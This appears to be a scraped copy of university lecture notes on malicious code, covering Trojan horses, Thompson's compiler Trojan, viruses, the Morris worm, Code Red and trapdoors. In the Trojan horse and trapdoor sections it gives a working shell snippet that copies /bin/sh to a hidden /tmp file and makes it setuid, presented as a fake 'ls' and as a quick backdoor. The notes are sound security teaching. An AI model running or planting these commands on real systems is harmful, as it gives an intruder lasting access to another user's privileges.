Role Based Access Control (rbac)

Yüklə 19,29 Kb.
ölçüsü19,29 Kb.

Spring 2005, Syracuse University Lecture Notes for CIS/CSE 785: Computer Security

Malicious Code

  1. Kinds of Malicious Code

  • Trojan horse

  • Virus

  • Logic bomb, time bomb

  • trapdoor, backdoor

  • Worm

(2) Trojan Horse

Trojan Horses: a piece of malicious code that, in addition to its primary effect, has a second, non-obvious malicious effect.

  • ls Trojan horse.

    • If somebody visits your directory, is it possible to trick the user into running a Trojan horse program?

    • If “.” is at the beginning of the victim’s PATH environment variable.

% cp /bin/sh /tmp/.xxsh

% chmod 4777 /tmp/.xxsh

% rm ./ls

% ls $*

  • Ken Thompson's Famous Trojan Horses

    • "Reflection on Trusting Trust", Turning Award Speech.

    • Goal: add a Trojan horse to login program, so that one can use a special password to log into the system. However, the Trojan horse should be difficult to detect and fix.

    • Approach 1: Change login binary

      • This is easy to fix, just recompile it from login.c.

      • How about also change login.c? This is easy to detect if somebody reads the code. Q: how to make it more difficult to detect?

    • Approach 2: Change compiler.c for login.c, and change login.c back to the normal. When the compiler compiles login.c, it automatically adds the Trojan horses to login binary.

      • What if somebody reads compiler.c? The Trojan horse in compiler.c can be detected. They can get another copy of compiler.c, and compile this new (and clean) compiler.c.

    • Approach 3: Change the complier.c, such that a Trojan horse will be added to the binary if compiler.c and login.c are compiled. After we get the binary of compiler, we change compiler.c back to the normal.

      • The Trojan horse is already built into the binary of compiler.

      • Unless somebody looks at the compiler binary, the Trojan horse is difficult to detect. None of the source files contain any Trojan horse; Trojan horses are added by the compiler.

      • To remove the Trojan horse, one has to change the compiler program.

  1. Virus

  • Must be activated by being executed. There are various ways to get activated

    • Running an affected program

    • Attachment (Melissa and Love bug)(Macro virus)

    • Reading email (Bubbleboy virus)

    • Appended Viruses

    • Viruses that surround a program

    • Boot Sector Viruses

  • Solutions

    • No general cure for viruses

    • Virus checkers are effective against known viruses only

  • Truths and Misconceptions about viruses

    • Viruses can infect systems other than PCs/MS-DOS/Windows

    • Q: why not many viruses exist in Unix?

    • Viruses can appear in data files: Microsoft Word Macro virus

  1. Worms

  • History of the Internet Worm

    • Nov. 2 1988, Robert T. Morris Jr.

    • His father Robert T. Morris Sr. (in NSA) and Ken Thompson wrote a paper about network security in 1979.

    • Flaw in worm: fail to check the existence of another copy of the worm.

  • What made worm a successful attack:

    • Difference from virus: propagate via networks

    • Bug in fingerd: buffer overflow

    • Backdoor in sendmail: DEBUG mode

    • Took advantage of a mechanism used to simplify resource sharing

    • Weak passwords: password guessing

      • Worm carries a short list of common passwords (432 passwords): e.g. "guest", "passwords", "aaa", "help", "coffee", "coke", etc.

      • Use the system dictionary if the short list fails

    • Disguise:

  • More Malicious Code: Code Red

    • Middle of 2001

    • Using Microsoft's Internet Information Server (IIS)

    • Using buffer overflows

  1. Trapdoors

  • Example of trapdoors

  • Another example: What is a fast way to gain somebody's full privilege forever when he/she leaves the computer for a short period of time?

    • % cp /bin/sh /tmp/.xxsh

    • % chmod 4777 /tmp/.xxsh

  • Causes of trapdoors:

    • Forget to remove

    • Intentionally leave them in the program for testing

    • Intentionally leave them for maintenance

    • Intentionally leave them as a covert means of access to the component

Wenliang Du Malicious Code: Page of 8/8/2018

Dostları ilə paylaş:

Verilənlər bazası müəlliflik hüququ ilə müdafiə olunur © 2019
rəhbərliyinə müraciət

    Ana səhifə